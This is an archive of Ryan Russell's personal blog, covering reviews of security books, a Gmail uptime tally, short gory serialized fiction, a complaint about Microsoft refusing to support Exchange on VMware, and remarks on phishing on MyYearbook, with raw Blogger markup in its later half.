ryanlrussell, a blog by Ryan Russell

Ghost in the Wires (posted 2011-10-07)

Ghost in the Wires, Mitnick & Simon

[Amazon link to the book]

Disclaimer: Kevin Mitnick is a personal friend, and this review is based on a late galley copy. I have no financial interest in this book. The above link is an affiliate link.

I have been reading books about Kevin Mitnick for years. Finally, we get to read the best one yet. All of the previous authors worked from information they could glean, and some limited interactions with Kevin himself. The problem is, he was playing most of them a lot of the time. What we have here is Kevin's own version of his story, written himself, along with his collaborator William Simon.

I'll just jump right in; I loved this book. If you have any interest in real-world hacks at all, read it. The other books and news stories didn't cover half of what he did. As I devoured it in two days, I kept turning to people to say "Read this!" or repeating one of his stories for co-workers.

I have some clear favorite stories, but I don't want to give any spoilers. It's that much like reading a thriller. My favorites are how he defeated the radio encryption used by the FBI, and how he would go about obtaining a new identity. Specifically, how and where he researched the identities, and got the appropriate document papers.

The sheer audacity that some of his tricks took is amazing to me. He admits things in the first few pages that surprised me. And after reading about how things went with his friends over the years, I finally have some appreciation for why he has such hatred of snitches.

Let's be clear, this is not a technical book like others I have read. He doesn't cover how to exploit a stack overflow. When he breaks into a Solaris box, he says "I used a Solaris exploit." He says that the reason for that was to make it more readable for the general public. And I don't think he's incorrect in that. The focus is story and history.

But even if you're a hard-core technical security person, I think you'll like the book for what it is. Unless you think that security begins and ends with writing a cool exploit. Do I think Kevin has technical skills? I do. But those aren't his greatest powers. Yes, he's a fantastic social engineer. And using those skills, he owned more things and companies than probably anyone else. A 0-day exploit that lets you break into a source control server is impressive. But I don't think it's quite as cool as calling up and getting them to just mail you a tape with the source. There's no patch for stupid.

You'll also enjoy the book if you have an interest in computer or security history like I do. It spans several decades, from when he was a kid interested in magic up to almost present day. There are the cameos from other well-known hackers that have had books written about them as well. I have enjoyed reading articles and seeing Twitter exchanges with Kevin and some of his old victims. (All amiable so far as I have seen.)

If you want the most accurate version of the Mitnick story available, here you go.

Gmail uptime (posted 2010-04-14)

My manager at BigFix was having a discussion with our CFO about Gmail uptime (in the context of our email infrastructure uptime).

Using this as a data source:
http://www.google.com/appsstatus#hl=en

and selecting Google Mail and Postini Services as the items to measure, he arrives at this:

Date       Service     Duration  Reason
4/9/2010   Postini     2:24      Unspecified Emergency Maintenance
4/7/2010   Core Gmail  11:20     HTML mode email down for "a small number of users"
4/2/2010   Postini     2:08      Failed Postini update
3/16/2010  Core Gmail  9:51      Inbound/Outbound Email was not routing
3/15/2010  Core Gmail  4:38      Users unable to access gmail accounts
3/10/2010  Core Gmail  0:50      Users unable to access gmail accounts
3/8/2010   Postini     0:29      Anti-Spam not anti-spamming
3/4/2010   Postini     0:58      Anti-Spam not anti-spamming
2/25/2010  Postini     7:46      Users unable to send email
Total                  40:24

Total runtime (2 services): 2304
48 days, 24 hrs/day, 2 services

Effective uptime: 98.24%

I have not done my own math here to verify, just thought it would be interesting to share. Note that he gives them twice as many runtime hours since he's counting two services. I would tend to halve that, resulting in double the downtime percentage.

I thank Google for publishing their outage information, by the way.

Just a data point for the next time someone is asking you for more nines than is reasonable.

Contradiction (posted 2010-03-19)

"They are all correct."

"How could they ALL be correct? They contradict each other. You can't have Heaven and Valhalla be the afterlife. If Heaven exists then that means that Valhalla doesn't. And vice-versa."

"Think of it as parallel universes."

"But doesn't the idea of a God transcend multiple universes? Isn't God the god of all universes?"

"Yes."

"And so is Zeus?"

"Yes. Infinite, parallel parallel universes."

"Which universe is Earth in?"

"Earth is Earth. The afterlife is different. It is when you change over."

"So if I'm from Earth, which one do I go to?"

"It depends on what you believe. You determine where you go, when you cross over."

"So if I believe in Judeo-Christian Heaven?"

"Then you go there."

"But what if I believe in that, but don't think I lived well enough?"

"Then you go to Hell."

"Does that mean there isn't a God?"

"All of the gods are. You go to the one you believe in."

"What if I believe in reincarnation?"

"Then you will be reincarnated."

"On Earth?"

"On an Earth, yes."

"What about the atheists?"

"They cease to be."

"That doesn't seem fair. They die?"

"It is what they believe happens. It is what they cause to happen."

"So if you don't have faith in something, you die?"

"Faith is not a belief in what might happen. It is what happens. It causes it to happen. If you believe death is the end of your existence, then it is so."

"So where would I go?"

"What do you believe?"

"I don't know, really. I believe... or maybe I hope something happens. I always had a hard time believing one church was right and that the others were wrong. Or that any of them were right. I guess I figured I would find out when it happened. I hope I will have a chance to figure it all out afterward."

"That is how you ended up here."

Fixer-Upper (posted 2009-11-29)

Continued from Welcome Home (http://ryanlrussell.blogspot.com/2009/11/welcome-home.html)

The sunlight disappeared again, and he assumed he was wheeled into a building. He felt several turns and a jolt that he thought must have been his gurney being shoved through a swinging door. He came to a halt, and another bright light painted his face sheet. Very artificial light.

The sheet was pulled away. More surgical masks this time. There was an overhead light on an articulated arm. Buzzed, muffled voices; one of the masked individuals gestured at the light to another. The latter grabbed a handle on the side of the light with a gloved hand, and aimed it directly into his face, forcing him to squeeze his eyes closed.

He felt latex-covered fingers prodding his head and neck. A shadow fell over his face, and he opened his eyes to see a masked face with plastic glasses leaning over his, looking into his face. He assumed the face belonged to a surgeon. The mask, glasses, head cover, gown, mostly blue paper said medical to him. The surgeon's head was blocking the flow of light. He could see the surgeon's jaw moving behind the mask, looking at him, talking to him, but all he could hear was the buzzing, muffled sounds. The surgeon gave up, and shook his head "no" to someone beside him.

The head withdrew and the bright light shut his eyes again. The probing fingers returned, concentrating on his neck. They pressed hard, causing him to flinch from the pressure. Down the side of his neck they poked, until they were partway down his shoulders, where the poking was replaced by a slight pressure or tugging. This was repeated multiple times on each side. Poking hard enough to get a reaction higher up on his neck, and then gentle pressure as they went further down his shoulders.

He felt fingers at his ears, pulling them in different directions from the outside. He didn't feel them extract whatever had been shoved into his ears that kept him from hearing, but they inserted something cold and hard into his right ear. His ear was still numb and the sound was muffled, when he felt a sudden stabbing pain in his ear. He instinctively tried to jerk, but the movement was truncated by the screws that still held his head in place. It didn't stop the stars of pain from lighting up his closed eyes.

While he was concentrating on stilling himself, the intensity of the light on his face abated. He opened his eyes and blinked away the tears. Looking up, he saw the light was aimed further down his body. He tried to follow with his eyes, but he was lying flat, and there were tubes at his nose and mouth partially blocking his view. He could see the surgeon's side near his face. The surgeon was bent over his body.

He watched the surgeon take several scalpels in a row, and bend low over him each time. Each time, he would place the bloody scalpel on a tray. He couldn't feel any pain. He realized that he must have been heavily drugged most of the time for days, which is why he couldn't move and was so foggy.

He didn't have any memory of his capture or injuries. He didn't know who had him, or if they were the ones who did this to him. He had eliminated the possibility that it was just medical personnel. Hospitals don't use military transports, and they don't keep you moving for days before they operate. Unless he dreamed all of that. Unless he'd already received some treatment. But he couldn't have dreamed all of it. He knew they had found him.

Next the surgeon grabbed some kind of big pliers or clamp. He saw that they opened when the handles were squeezed as the surgeon flexed them. He must have left them in place, because he stood up empty-handed. He was handed what looked almost like a soldering gun, but when the surgeon pulled the trigger, he could see a small blade vibrate at the end, almost like a tiny skillsaw.

His eyes went wide when he realized that it was a sternum saw, and that his chest was being cut open. His eyes went wide, and he tried to thrash. The panic made him able to ignore the pain as he writhed and his eyes rolled in his skull. The surgeon stopped momentarily and motioned in his direction with a tilt of his head. From behind, he felt a needle insert into his neck. A slight burning spread up the blood vessel in his neck. The needle was withdrawn, and they unceremoniously dropped the sheet back over his head box.

As he sank down below consciousness, he thought "why are they keeping me alive?"

Welcome Home (posted 2009-11-23)

I thought I might experiment with some serialized fiction on my blog. I'm trying a slightly different style. I'm going to attempt to be a little gory and disturbing so if that bothers you, fair warning. I'll have a tag for these posts later.

-- end author's note

The jolt from the helicopter landing shook him into awareness. Another stab of lightning shot through his head and made his vision go white. Water leaked from behind his eyelids, squeezed tight from the pain. He knew it was a helicopter from the vibrations of the rotors. He had spent a little time on helicopters in his 20's.

He couldn't tell if it had been days, or a week, or more. He spent much of the time unconscious from pain or drugs. Or not being able to tell the difference between real and imagined. Rarely, he could catch a blurry glimpse of the inside of an ambulance or plane when they would remove his head covering to work on him. If he didn't have an overhead light blinding him.

Every face he caught sight of during this time was covered with a mask. These ranged from baby-blue or white surgical masks, to Army green and SWAT black gas masks.

He could tell words were being spoken all around him, but was unable to understand them. Not because they weren't English. He thought they were, from the rhythms of the words. He couldn't understand because they had shoved something in his ears days ago and left it there. Words came to him as a buzzing, scratchy sound. The loudest thing in his head was a constant tone, like an old modem trying to sync. He could "hear" the helicopter blades as a vibration in his skull. His ears hurt, but the pain level barely registered above the symphony of hurt that was his head.

Frightening to him, it was only his head that hurt. He had been able to see down his body twice. Each time, covered and strapped down. The whole time he was in custody, they had him strapped down to a gurney. He thought he had moved his arms and legs a few times while strapped down. Simultaneously light and drug-deadened.

Tubes ran through his mouth and nose. A machine pumped air in and out of him. He could feel temperatures and pulses slide through the tubes. His head was caged in a scaffold of bars, forming a box. At odd angles to the box were long, spiked screws that drilled directly into his skull, immobilizing him. The entire box was draped with a sheet.

Shadows across the sheet indicated that there were men at the sides of his gurney. It started to shake, and then it felt like he was rolling. He imagined fabric straps being released from the floor and walls and his wheels being unlocked. He was rolled towards what must be the helicopter door, and hoisted by his pall bearers. He floated through the air briefly until his wheels made contact with ground again. There was a qualitative difference between rolling on the steel floor of a vehicle and the rough pavement or concrete he rolled on now.

As he rolled, the shadow line suddenly crossed his sheet, and bright light illuminated his covering. He could immediately tell the sunlight from the artificial lights he'd been under. 
The warmth and color were unmistakable.<br /><br />It was the last time he would ever see sunlight with his own eyes.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-42884141937023542582009-05-11T21:22:00.001-07:002009-05-11T21:28:53.658-07:00Concept ArtSome concept art for a project I'm working on with my oldest son. He's the artist, not I.<p><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzOyG2nU3LQigWGRiUNyapS_IGH7lhUTAFUOLEkaEJrdagkGLxwaEOFTVPozHpd_u_gLNxkFIO1xkTyfaDTcPPfzr6JS7t9k0ay9eDdOpq6j828c-YUmUiZUmmvmlhN6Eqe-ofHQ/s1600-h/concept80001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 157px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzOyG2nU3LQigWGRiUNyapS_IGH7lhUTAFUOLEkaEJrdagkGLxwaEOFTVPozHpd_u_gLNxkFIO1xkTyfaDTcPPfzr6JS7t9k0ay9eDdOpq6j828c-YUmUiZUmmvmlhN6Eqe-ofHQ/s400/concept80001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789515801230034" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX6ASNz8fh3f6ncwzSFXlsFEIer_R_CfFzenX5UYlLVlGMApGUlMtrhmq8ysR7Gr0S-tqUf9obYRFD2x8alqOUvIwZX9M7iNhYlRefFvYWwTU8MHu96huavnrrCIJaMuxi0TS2PQ/s1600-h/concept70001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 310px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX6ASNz8fh3f6ncwzSFXlsFEIer_R_CfFzenX5UYlLVlGMApGUlMtrhmq8ysR7Gr0S-tqUf9obYRFD2x8alqOUvIwZX9M7iNhYlRefFvYWwTU8MHu96huavnrrCIJaMuxi0TS2PQ/s400/concept70001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789410759599378" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55ZxvT8h_IP04KyFik9W3aIRdVA2zZCZHrQybmbQm2wGYv4pZB_knNUVG7hl7NjFegOFXC0IMZrmqqE4RuISJa83SWyFBGLKIH2uxapYvRprSHBQFw2srYe1B-dhBR3N0eDSgcw/s1600-h/concept60001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 246px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55ZxvT8h_IP04KyFik9W3aIRdVA2zZCZHrQybmbQm2wGYv4pZB_knNUVG7hl7NjFegOFXC0IMZrmqqE4RuISJa83SWyFBGLKIH2uxapYvRprSHBQFw2srYe1B-dhBR3N0eDSgcw/s400/concept60001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789333227298930" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxM8XttTXgtddTpfegbBsMKuDjUk6Pl5VjAVaUOCQgPdszhJS2WrROOcjXfNdlFpZCtXljF4UeKbqkMANBTKTkB9GQbWbi9Ic4UBYhMD8pjna13VuMlIzGiWXIooNitR8QkBIkkQ/s1600-h/concept50001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 304px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxM8XttTXgtddTpfegbBsMKuDjUk6Pl5VjAVaUOCQgPdszhJS2WrROOcjXfNdlFpZCtXljF4UeKbqkMANBTKTkB9GQbWbi9Ic4UBYhMD8pjna13VuMlIzGiWXIooNitR8QkBIkkQ/s400/concept50001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789257578019522" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8S41A7FnaD9SMqVxPPjjfp8PMB3iPPpJoig0auP5kbOAjwxB5v6QKPevtI15ewoQjWXSoqHyYRsmcFrL9zAjKkeUiU6a2xEvSismxwflZXwDpJfUlxnBBAkYZPm5WS9sbQqPVg/s1600-h/concept40001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 309px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8S41A7FnaD9SMqVxPPjjfp8PMB3iPPpJoig0auP5kbOAjwxB5v6QKPevtI15ewoQjWXSoqHyYRsmcFrL9zAjKkeUiU6a2xEvSismxwflZXwDpJfUlxnBBAkYZPm5WS9sbQqPVg/s400/concept40001.JPG" 
alt="" id="BLOGGER_PHOTO_ID_5334789157570679922" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI8uPR7C6SJPoA-eljLj9wn7zKjlhabZp-IMfwJJAMucd5phGGyp4SngGMS-zGgSqgd6G2-27mOtg2btDSMpg1nVPs0E3Zjv09bN2VzPKR4A1G8k3PyZq5k3XUjGlnba3mSpuWdg/s1600-h/concept30001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 304px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI8uPR7C6SJPoA-eljLj9wn7zKjlhabZp-IMfwJJAMucd5phGGyp4SngGMS-zGgSqgd6G2-27mOtg2btDSMpg1nVPs0E3Zjv09bN2VzPKR4A1G8k3PyZq5k3XUjGlnba3mSpuWdg/s400/concept30001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788999376614386" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisM7X7948OpnxbMxfNHJANHitcrdNQw5xFy7cxWSYrcgZFkWOosbWSibYc0VsArIzW34Kw1EJ94qCX20uTlt1JUf_PrrfbMZPLxYuWFUTyH7s9MxO9jk9tlupfTc1OsJXZTQFUYQ/s1600-h/concept10001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 291px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisM7X7948OpnxbMxfNHJANHitcrdNQw5xFy7cxWSYrcgZFkWOosbWSibYc0VsArIzW34Kw1EJ94qCX20uTlt1JUf_PrrfbMZPLxYuWFUTyH7s9MxO9jk9tlupfTc1OsJXZTQFUYQ/s400/concept10001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788445785998978" border="0" /></a><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYlZu_-KYa_Ml2E1RjsnXNXNyloLkBmldDl1VbkYM8Aq5EgazKqvEwgXkP0mdV0gg6PZhewMdWdaXhZZLVG_G2gWcl9uv7Ktqq7hj8vIcGxFkuDV0sMbhjfD6HahY3yArEGKBgQw/s1600-h/concept20001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 285px; height: 400px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYlZu_-KYa_Ml2E1RjsnXNXNyloLkBmldDl1VbkYM8Aq5EgazKqvEwgXkP0mdV0gg6PZhewMdWdaXhZZLVG_G2gWcl9uv7Ktqq7hj8vIcGxFkuDV0sMbhjfD6HahY3yArEGKBgQw/s400/concept20001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788798066126034" border="0" /></a><br /><br /></p>Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com4tag:blogger.com,1999:blog-18579416.post-79369275848872175462009-05-11T20:22:00.000-07:002009-05-11T21:13:48.960-07:00The Mac Hacker's Handbook<div style="text-align: left;"><iframe src="http://rcm.amazon.com/e/cm?t=thievco&o=1&p=8&l=as1&asins=0470395362&fc1=000000&IS2=1&lt1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width: 120px; height: 240px;" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe><br /></div><br />The Mac Hacker's Handbook is the best reference for Mac-specific attack information that I have found. At 368 pages, it may appear small compared to the typical 750+ page security tome. That's because the authors have done a near-perfect job of sticking to the topic at hand, the Mac. The authors do not succumb to the usual temptation to try and teach assembly language or reverse engineering. Rather, they do an excellent job touching on those topics in an OS X context, and assume the reader has a little background in that area already, or can otherwise keep up. I have done some limited research into the areas of Mac malware and process injection in the past. This book has done a fantastic job of filling in many holes in my knowledge that I hadn't been able to take care of before. Plus, it introduced me to a number of Mac-specific security features I wasn't aware of before. 
Highly recommended for anyone interested in Mac security.<br /><br />Detailed commentary follows.<br /><br />The authors Charlie Miller and Dino Dai Zovi have impressed me on several levels.<br /><br />A couple of years ago, I did a presentation of Mac malware, where I researched some similar areas on my own. The purpose of my talk was to demonstrate that the privilege separation on a typical single-user OS X box made no difference, because an attacker could do everything they need from user mode.<br /><br />My skills are somewhere between beginner and intermediate in the areas of programming, reverse engineering, vulnerability research and exploit writing. With a lot of work, I was able to create a very crude keyboard sniffer by attaching a library to launched processes. In one chapter (chapter 11), this book spelled out everything I needed to know and more. And implements several useful injected components in a much more flexible way than I was able to. I could have really used this information then.<br /><br />I ran across many of the same libraries and examples that the authors reference in the book. However, they were mostly code examples with no context, intended to be groked by hard-core Mac programmers. Here, they are presented in an actual understandable way, building on examples as they go. It makes a huge difference. The level of writing meshed perfectly with my past knowledge and filled in the holes I had. I have an advantage over a rank beginner, but I suspect they have reached as wide an audience as is possible with their writing.<br /><br />They do this consistently throughout the book. And this is what really made this an excellent book for me, was the actual writing. You'll have to excuse me if I geek out a little bit on this topic, but I've written a few technical books myself, and I have a great appreciation for how hard it is to do this well.<br /><br />There are many traps one can fall into when writing a book like this. 
A lot of the topics are circular. As in, it's difficult to pick a sane order to follow, and not repeat a lot of information. There's always a temptation to try and show off advanced topics, and not adequately cover the intro material. It's easy to get lazy and not put the time into explaining a concept, assuming everyone knows it. Authors sometimes dump a lot of pictures and code on the reader for length.<br /><br />These authors fell for none of these. The ordering of topics and advancing difficulty seem ideal. Code is almost uniformly useful and well-documented. They don't beat you over the head with example after example for the same topic. Rather than attempting to include a complete PowerPC and x86 instruction reference, they give you the minimum set of instructions that they used. The pacing was great. I was neither bored reading things I knew, nor unable to keep up with the material (until I struggled slightly to absorb the last chapter or two.)<br /><br />Production values are good. The price is great, the length is very appropriate. Editing is good. (Not perfect; I spotted a dozen very minor typos. But then, I can't turn off my internal proofreader anymore, you're unlikely to notice most if any of those.)<br /><br />There are other minor things to appreciate if you've been around vulnerabilities and exploits for a while. I feel like they did a great job explaining heap exploitation, compared to other attempts I've read. I very much enjoyed the little bits of history when they discuss who pioneered a particular technique. Most of Dino's code has a date in the comments, so you have some idea what was known at the time.<br /><br />I'd go so far as to say that this book really is a general book about how to find and exploit vulnerabilities, using the Mac as your research platform. 
And it turns out that the Mac is a great place to learn.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-91458182829340864652009-04-02T00:02:00.000-07:002009-04-02T01:13:38.731-07:00Hey! You! Get off of that cloud!Or Microsoft won't support you.<br /><br />We've had an interesting several days dealing with Microsoft at work. <span class="blsp-spelling-error" id="SPELLING_ERROR_0">BigFix</span> recently signed an Enterprise Agreement with Microsoft, where we committed to X licenses of the workstation OS, and put a number of other things under Select Agreement, including Server OSes, Exchange, <span class="blsp-spelling-error" id="SPELLING_ERROR_1">SQL</span> Server, <span class="blsp-spelling-error" id="SPELLING_ERROR_2">MSDN</span> subscriptions, and so on. This came with a few free support calls.<br /><br />Our OS X and iPhone users (in particular, our CEO) have been anxious to get on Exchange 2007 for the rumored improved Entourage and iPhone support around calendars. So when our CFO wrote the large (for us) check to Microsoft, the IT Team committed to implementing Exchange 2007 in an aggressive time frame. Currently, we're using Exchange and <span class="blsp-spelling-error" id="SPELLING_ERROR_3">OWA</span> 2003.<br /><br />Doing some research, it looked like the best option was to build new Exchange and <span class="blsp-spelling-error" id="SPELLING_ERROR_4">OWA</span> machines and migrate mailboxes. It also looks like the best OS choice is Windows 2003 Server Enterprise 64-bit. We read some documents that indicate Exchange 2007 isn't fully supported on 32-bit Server, and has only just been qualified on Server 2008.<br /><br />We put Exchange itself on physical hardware for performance reasons. It's probably not really <span class="blsp-spelling-corrected" id="SPELLING_ERROR_5">necessary</span>, but we're being conservative. 
We used a Dell 2850 with about 1TB of disk and 32GB of RAM that was a <span class="blsp-spelling-error" id="SPELLING_ERROR_6">VMWare</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_7">ESX</span> server until I replaced it with an even larger Dell R900. It's running Windows Server 2003 Enterprise R2 64-bit. The <span class="blsp-spelling-error" id="SPELLING_ERROR_8">OWA</span> machine doesn't need any particular performance characteristics though, so we decided to put it on a <span class="blsp-spelling-error" id="SPELLING_ERROR_9">VM</span>. It's on the same OS. No problems running 64-bit guests, by the way. We do it all the time.<br /><br />Like many companies, we're trying to <span class="blsp-spelling-error" id="SPELLING_ERROR_10">virtualize</span> a lot of our infrastructure. We've made a fairly large investment in <span class="blsp-spelling-error" id="SPELLING_ERROR_11">VMWare's</span> enterprise products for a company our size, especially in our Engineering organization. I won't get into the benefits here, but for us they are substantial, and our entire disaster recovery plan is tied to <span class="blsp-spelling-error" id="SPELLING_ERROR_12">VMWare</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_13">ESX</span>.<br /><br />Things were on schedule with the Exchange 2007 configuration. In the interest of time, we had made one support call to Microsoft for install problems on the physical hardware. It burned the equivalent of $299, but for our schedule, it was easily worth it. Exchange was working.<br /><br />We ran into a second issue with <span class="blsp-spelling-error" id="SPELLING_ERROR_14">OWA</span> 2007. My sysadmin was having trouble getting Outlook Anywhere to work correctly with Outlook 2003 and Entourage. He called again. 
This time, while the Microsoft support engineer was remote into our OWA server, he saw VMWare Tools in the Add/Remove Programs list. He asked, and we said yeah, it's a VM.<br /><br />He said he could not support us, closed the ticket, and advised us to rebuild on physical hardware and call back. The support engineer also said that if we had had Premier Support, that he could "Look into it." He cited this article: <a href="http://support.microsoft.com/kb/897615">http://support.microsoft.com/kb/897615</a><br /><br />I'll summarize it: Microsoft only supports virtualized Windows and MS apps if you use Microsoft virtualization software.<br /><br />That had never occurred to any of us in the IT department. That policy is so ridiculous as to defy belief.<br /><br />I complained into the air on Twitter. I got two categories of response: Lie to Microsoft Support, and No, they do support it. It's called the SVVP.<br /><br />Sure, we're willing to lie to support. We just didn't know it was necessary, and we got caught this time.<br /><br />By the way, I'm going to jump ahead in the story for a moment and say that yes, we did rebuild OWA on physical hardware and call back. And it turns out that the problem was on the Exchange server, NOT the OWA server. 
So no, it's not possible that VMWare was a factor, and yes, we did waste days and slipped our schedule for no good reason. I say this mostly to save you the trouble of trying to fix my technical problem, it's already done.<br /><br />And of course, that's not the real issue.<br /><br />During these several days while my sysadmin gave up and built a physical box to appease Microsoft Support, the rest of us were complaining bitterly to our Microsoft sales rep. We still could not believe that they really intended to have that as a policy. He insists that they did. He knows, because he has had "lots of customers complain about it."<br /><br />What about the <a href="http://www.windowsservercatalog.com/svvp.aspx">SVVP</a>, I asked my sales rep? Both a Microsoft employee and a VMWare employee pointed out to me on Twitter that ESX IS supported. Nope, my sales rep says that's only for the Windows OS itself.<br /><br />But wait, the VMWare guy pointed out to me that <a href="http://technet.microsoft.com/en-us/library/cc794548.aspx">Exchange on VM</a> is specifically covered under the SVVP. Surely this means I'm good, right? This is just a case of Microsoft Support not being up on the latest Microsoft policies?<br /><br />Nope. 
That article only covers Exchange 2007 SP1 (good) on SVVP virtualization software (good) on Windows Server 2008 (bad, I'm using Server 2003.)<br /><br />So yes, they STILL turned me down for support on ESX. But they would support all of it if I was using Hyper-V.<br /><br />This is far worse than my little problem not being handled. This would seem to indicate that Microsoft intends to qualify every single app they produce as being covered on VMWare or not. And only the versions that they feel like. And only if it's on a Windows version they want to cover.<br /><br />So the latest set of articles on how to tune SQL Server 2005 on ESX? Forget it. It's not supported.<br /><br />It's really hard to not immediately leap to accusing Microsoft of more anticompetitive behavior and vendor lock-in for their own virtualization technology.<br /><br />Does Microsoft qualify every individual app on the hardware in the supported hardware list? Of course not. If the OS works, the apps should work. That is the basic job of the OS, yes? To abstract the hardware for the apps? 
So if Microsoft has qualified Windows 2003 on ESX, why should they decline to support OWA on it?<br /><br />Is there an Exchange 2007 SP1 supported hardware list somewhere I'm not aware of?<br /><br />At my most generous, I can assume that Microsoft Support is just not aware of Microsoft's own policies on this topic. And Microsoft Sales isn't either. My rep still says he can't help me. I can even see wanting to qualify Microsoft OSes on ESX "hardware", just like they would on Dell or HP. (Though when is the last time Microsoft Support even ASKED you what hardware you're running on?)<br /><br />But to try and take a policy that every app needs to be qualified individually, down to the service pack level? Unless you're on Microsoft's virtualization technology?<br /><br />That's just quite possibly criminal.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com18tag:blogger.com,1999:blog-18579416.post-51114389170684417852008-08-04T11:48:00.000-07:002008-08-04T11:49:30.422-07:00TwitterTwitter:<br /><a href="http://twitter.com/ryanlrussell">http://twitter.com/ryanlrussell</a><br /><br />Tweet, or something.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com1tag:blogger.com,1999:blog-18579416.post-46041255117269479872008-07-21T12:08:00.000-07:002008-07-21T12:21:14.043-07:00MyYearbookI've been wasting a bunch of time on MyYearbook.com, a MTWWTOSNS (massively time-wasting web-two-oh social-networking site.) If you'd like to descend into madness with me, click here to join for my personal gain:<br /><a href="http://www.myyearbook.com/join.php?ref=1211864511">Be Ryan's Friend</a><br /><br />Several interesting aspects to this one, for security people. 
First, there are many sociological aspects. For example, what happens if you tell people they <span style="font-style: italic; font-weight: bold;">can't</span> post naked pics? Second, there is a play money currency, which drives everyone's behavior. Finally, they are getting phished left and right from <span style="font-style: italic; font-weight: bold;">within</span> the site.<br /><br />And the staff there appears to be so woefully unprepared to deal with it. When I saw the phishing, I thought I might mail their abuse contact info (only email address I found published), and see if they needed info, if I could put them in touch with a takedown group, etc. I got bounces from gmail. Um, your abuse email at your own domain depends on gmail?<br /><br />The site is absolutely begging for someone to start using XSS. The game model they have basically demands it. For example, your popularity depends on profile views. And I can post a pretty wide range of HTML to someone in about 20 different ways. I haven't tried to see if I can find any XSS. Mostly because I don't trust myself not to abuse it.<br /><br />But my favorite thing about MyYearbook that I just realized, while sitting in JFK coming back from HOPE. This site is teaching millions of people how to do simple HTML. And nearly half of these people are below average intelligence.<br /><br />Edutainment, indeed.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-58408709910837504722008-07-18T23:10:00.000-07:002008-07-18T23:22:20.342-07:00Politics, $8.34 worthThis post is about politics, which I normally would avoid. 
But humor me this one time.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://seantevis.com/kansas/3000/running-for-office-xkcd-style/"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://farm4.static.flickr.com/3249/2676618297_4fe5d1d9ca_o.png" alt="" border="0" /></a>Click on the pic to have your geek heartstrings pulled. Short version: If he's willing and able to put this up, that's all I need to know. Don't care if he's pandering.<br /><br />Yeah, I gave him $8.34.<br /><br />Long version: Doesn't matter if he's in Kansas, I want people like this to succeed. Doesn't matter if I agree with all of his policies, you never get a candidate that matches exactly, and you can't count on them to implement them once in office. Plus, he appears to be able to change his mind based on <a href="http://seantevis.com/kansas/issue/illegal-immigration/">feedback</a>, holy crap.<br /><br />If you want more candidates like this, consider giving him the token donations (US only), and blog him up.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-27559920383788237032008-07-15T21:17:00.000-07:002008-07-15T21:18:52.031-07:00HOPEI'll be in NYC for HOPE, starting tomorrow. Any of you going to be there?Ryan 